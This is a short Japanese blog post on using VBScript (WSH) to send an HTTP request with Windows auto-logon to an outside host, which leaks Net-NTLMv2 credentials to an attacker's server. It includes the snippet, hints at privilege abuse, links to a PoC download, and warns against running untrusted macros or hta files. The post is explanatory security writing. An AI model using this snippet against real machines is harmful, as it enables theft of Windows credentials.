nknskn ネタ置き場

IT使ってなんかやってる人間のたわごと

Windows認証のHTTPリクエスト(Net-NTLMv2)を送るVBScript(超ヤバイ)

VBScript、オモシロイ

VBScriptネタ2つ目。枯れた技術なvbscript(WSH)で一体どこまでできるんだろうと調べているところだったりする。
内容はタイトルとサンプルソースが全て。ちなみにこれで何ができるかと言うと、前回のブログの内容&Net-NTLMv2認証に使う情報の取得+事前送信とを組み合わせて、UAC bypassやら権限昇格やらmimikatzやらなしで攻撃者はゲフンゲフンできてしまう、という話。

Windows認証なHTTPリクエストを送るVBScript

Dim obj : Set obj = CreateObject("WinHTTP.WinHTTPRequest.5.1")
Dim url : Set url = "http://hogehogefugafuga.com/"
obj.SetAutoLogonPolicy AutoLogonPolicy_Always
obj.Open "GET", url, False
obj.Send
Set obj = Nothing

結論

サーバ側にchallengeを送るためのシロモノだったり取ったデータを文字列として出力する仕組みがあるとゲフンゲフン...vbscript(WSH)、ヤバイ。管理者に刺さったりでもしたらゲホゲホ。
f:id:news-nknskn:20191204145241p:plain f:id:news-nknskn:20191204144956p:plain

くれぐれも外から送られてきたマクロやらhta(wshが動くモノ)は実行しないこと。

2019/12/13(ジェイソンの日)追記
PoCとDEMOとか説明用pptxのダウンロードリンク
https://www.dropbox.com/s/l7vdr07xooe8ptu/Get-NTLMv2.zip?dl=0
パスワードは100桁なので欲しければDMとかくだしあ